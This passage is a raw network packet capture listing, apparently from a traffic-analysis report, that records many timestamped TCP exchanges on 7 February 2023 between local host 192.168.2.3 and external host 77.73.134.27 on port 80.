                                                                                    Feb 7, 2023 19:44:56.072912931 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.072916031 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.072941065 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.072942972 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.072968960 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.072969913 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.072990894 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.073018074 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.073034048 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.073046923 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.073064089 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.073075056 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.073102951 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.073103905 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.073122025 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.073134899 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.073156118 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.073163986 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.073180914 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.073194027 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.073220968 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.073246002 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.073277950 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.073313951 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.073327065 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.073342085 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.073369980 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.073380947 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.073396921 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.073405027 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.073426008 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.073431969 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.073453903 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.073456049 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.073482990 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.073489904 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.073512077 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.073514938 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.073539019 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.073539019 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.073561907 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.073570967 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.073587894 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.073600054 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.073616982 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.073628902 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.073647022 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.073678970 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.103991985 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.104118109 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.121033907 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.121066093 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.121087074 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.121109009 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.121130943 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.121151924 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.121172905 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.121196032 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.121206999 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.121227026 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.121249914 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.121273041 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.121294975 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.121315002 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.121335983 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.121356010 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.121376038 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.121731043 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.121753931 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.122147083 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.122175932 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.122945070 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.376923084 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.427779913 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.680989027 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.681210041 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.810714006 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.816075087 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.833240986 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.833302975 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.833323956 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.833489895 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.838593960 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.838634014 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.838661909 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.838713884 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.838751078 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.838761091 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.838782072 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.838809013 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.838814974 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.838831902 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.838848114 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.838860035 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.838882923 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.838913918 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.838922977 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.838943958 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.838975906 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.838984966 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.839004993 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.839045048 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.839050055 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.839076042 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.839106083 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.839114904 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.839139938 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.839170933 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.839179993 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.839212894 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.839241028 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.839250088 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.839270115 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.839298010 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.839307070 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.839324951 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.839350939 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.839361906 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.839371920 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.839397907 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.839411020 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.839426994 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.839453936 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.839467049 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.839479923 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.839505911 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.839515924 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.839534998 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.839561939 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.839574099 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.839590073 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.839617014 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.839627981 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.839641094 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.839668036 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.839679003 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.839696884 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.839725018 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.839736938 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.839751959 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.839783907 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.839795113 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.839814901 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.839842081 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.839852095 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.839869976 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.839895964 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.839907885 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.839924097 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.839951992 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.839965105 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.839979887 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840006113 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840017080 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.840032101 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840059042 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840069056 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.840085983 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840114117 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840127945 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.840142012 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840168953 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840179920 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.840197086 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840223074 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840235949 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.840250015 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840276003 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840287924 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.840301991 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840327978 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840338945 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.840357065 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840383053 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840393066 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.840410948 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840437889 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840447903 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.840465069 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840491056 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840504885 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.840519905 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840548992 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840557098 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.840574980 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840605021 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840612888 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.840631962 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840657949 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840668917 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.840687037 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840714931 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840728045 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.840740919 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840768099 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840778112 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.840795040 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840822935 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840831041 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.840852022 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840879917 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840888977 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.840909004 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840938091 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840948105 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.840967894 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.840997934 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841008902 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.841026068 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841053963 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841064930 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.841084003 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841110945 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841125011 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.841135979 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841161966 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841177940 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.841187954 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841213942 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841228008 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.841240883 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841270924 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841279984 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.841299057 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841325998 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841337919 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.841355085 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841382027 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841391087 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.841408014 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841435909 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841448069 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.841463089 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841489077 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841500998 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.841516018 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841541052 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841564894 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.841567039 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841593981 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841609001 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.841619968 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841645956 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841660976 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.841671944 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841697931 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841715097 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.841727018 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841748953 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841768980 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841774940 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.841789007 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841808081 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841814041 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.841829062 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841847897 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.841849089 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841870070 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841887951 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.841890097 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841912031 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841928959 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.841933012 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841954947 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841974020 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.841976881 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.841995955 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842016935 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842017889 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.842037916 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842058897 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842058897 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.842078924 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842098951 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.842099905 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842122078 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842142105 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842142105 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.842161894 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842181921 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842181921 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.842204094 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842225075 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842225075 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.842245102 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842263937 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.842264891 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842286110 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842304945 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.842307091 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842328072 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842345953 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.842349052 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842370987 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842386007 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.842391014 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842412949 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842428923 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.842433929 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842454910 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842474937 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842477083 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.842494965 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842516899 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842516899 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.842536926 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842557907 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842559099 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.842578888 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842598915 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.842600107 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842621088 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842637062 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.842642069 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842664003 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842679977 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.842684031 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842717886 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842731953 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.842740059 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842761040 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842778921 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.842780113 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842802048 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842819929 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.842822075 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842843056 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842863083 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842875004 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.842884064 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842901945 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.842905045 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842926979 CET804969877.73.134.27192.168.2.3
